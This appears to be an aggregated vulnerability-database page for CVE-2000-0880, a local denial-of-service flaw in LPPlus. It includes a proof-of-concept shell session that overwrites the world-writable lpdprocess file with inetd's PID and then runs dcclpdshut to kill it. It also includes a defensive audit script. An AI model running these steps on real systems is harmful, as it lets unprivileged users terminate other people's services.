CVE-2000-0880
CVSS 3.6
Published: 2000-11-14 00:00:00
Last revised: 2008-09-05 16:22:06

[Original] LPPlus creates the lpdprocess file with world-writeable permissions, which allows local users to kill arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to kill the process that was specified in the lpdprocess file.


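[CNNVD] LPPlus Permissions DoS Vulnerability (CNNVD-200011-021)

        LPPlus creates the lpdprocess file with world-writable permissions. A local user can terminate arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to terminate the process named in the lpdprocess file.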
        

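- CVSS (Base Score)

CVSS score: 3.6 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]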

- CPE (Affected Platforms and Products)

cpe:/a:plus_technologies:lpplus:3.2.2
cpe:/a:plus_technologies:lpplus:3.3

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0880
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0880
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-021
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/static/5200.php
(UNKNOWN)  XF  lpplus-process-perms-dos
http://www.securityfocus.com/bid/1643
(VENDOR_ADVISORY)  BID  1643
http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

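- Vulnerability Information

LPPlus Permissions DoS Vulnerability
Low severity  Access validation error
2000-11-14 00:00:00 2005-10-20 00:00:00
Local
        LPPlus creates the lpdprocess file with world-writable permissions. A local user can terminate arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to terminate the process named in the lpdprocess file.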
        

- Advisories and Patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability Information (20192)

LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities (EDBID:20192)
unix local
2000-09-06 Verified
0 Dixie Flatline
N/A
source: http://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process and then runs $LPHOME/bin/dcclpdshut, the target process receives signal 2 (SIGINT). Because the file is world-writable and dcclpdshut is executable by any user, any user can shut down any process this way.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$		
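
A defender-side check for the two conditions described above, as an added example that is not part of the original advisory: it flags any of the six named programs that are setuid and executable by any user, and a world-writable lpdprocess file. The function name `lpplus_audit` and its output format are assumptions; the file names under $LPHOME are the ones the advisory lists.

```shell
#!/bin/sh
# Added audit example (not vendor code). lpplus_audit and its output format
# are hypothetical; file names under $LPHOME are the ones the advisory lists.
# Prints one line per finding; returns 1 if anything was found, else 0.
lpplus_audit() {
    lphome=$1
    findings=0

    # Vulnerability #1: start/stop programs that are setuid and runnable by anyone.
    for prog in dccsched dcclpdser dccbkst dccshut dcclpdshut dccbkstshut; do
        f="$lphome/bin/$prog"
        [ -f "$f" ] || continue
        # -perm -4000 = setuid bit set, -perm -0001 = executable by "other"
        if [ -n "$(find "$f" -perm -4000 -perm -0001)" ]; then
            uid=$(ls -ln "$f" | awk '{print $3}')
            echo "SETUID-WORLD-EXEC $f (owner uid $uid)"
            findings=$((findings + 1))
        fi
    done

    # Vulnerability #2: PID file that any local user can rewrite.
    pidfile="$lphome/system/lpdprocess"
    if [ -f "$pidfile" ] && [ -n "$(find "$pidfile" -perm -0002)" ]; then
        echo "WORLD-WRITABLE $pidfile (mode $(ls -ln "$pidfile" | awk '{print $1}'))"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

# Run against a real installation only when LPHOME is set in the environment.
if [ -n "${LPHOME:-}" ]; then
    lpplus_audit "$LPHOME" || echo "LPPlus permission findings listed above" >&2
fi
```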

- Vulnerability Information

13739
LPPlus lpdprocess File Permission Weakness Arbitrary Process Termination
Local Access Required Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- Vulnerability Description

- Timeline

2000-09-06 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
